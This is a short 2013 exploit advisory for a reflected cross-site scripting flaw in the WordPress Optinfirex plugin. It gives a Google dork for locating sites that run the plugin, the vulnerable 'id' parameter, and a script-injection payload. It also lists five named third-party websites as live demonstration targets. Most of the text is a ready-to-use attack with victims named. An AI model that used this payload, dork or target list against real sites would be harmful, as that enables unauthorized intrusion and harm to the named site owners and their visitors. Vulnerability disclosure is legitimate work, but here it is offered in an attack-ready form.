WordPress Optinfirex third party plugin suffers from a cross site scripting vulnerability. Note that this advisory has site-specific information.
406b64a71217b4d7101b4e75837a87536ec5f4df1b52cca998fe666d372c6537
#********************************************************************************
# Exploit Title : Wordpress optinfirex plugin Cross site scripting
#
# Exploit Author : Ashiyane Digital Security Team
#
# Vendor Homepage : http://wordpress.org
#
# Google Dork : inurl :wp-content/plugins/optinfirex
#
# Date: 2013-11-26
#
# Tested on: Windows 7 , Linux
-------------------------------------------------------------------
# Exploit : Cross site scripting
#
# Location : [Target]wp-content/plugins/optinfirex/lp/index.php?id=[xss]
#
# Script For Test : "/><script>alert(1);</script>
######################
# Demo:
#
# http://www.avantmedispa.com/wp-content/plugins/optinfirex/lp/index.php?id=
"/><script>alert(1);</script>
#
# http://www.inquestgroup.com/wp-content/plugins/optinfirex/lp/index.php?id=
"/><script>alert(1);</script>
#
# http://www.drvictorchan.com/wp-content/plugins/optinfirex/lp/index.php?id=
"/><script>alert(1);</script>
#
# http://www.obxwellness.com/wp-content/plugins/optinfirex/lp/index.php?id=
"/><script>alert(1);</script>
#
#
http://www.weightlosstips101.org/wp-content/plugins/optinfirex/lp/index.php?id=
"/><script>alert(1);</script>
#
######################
discovered by : ACC3SS
######################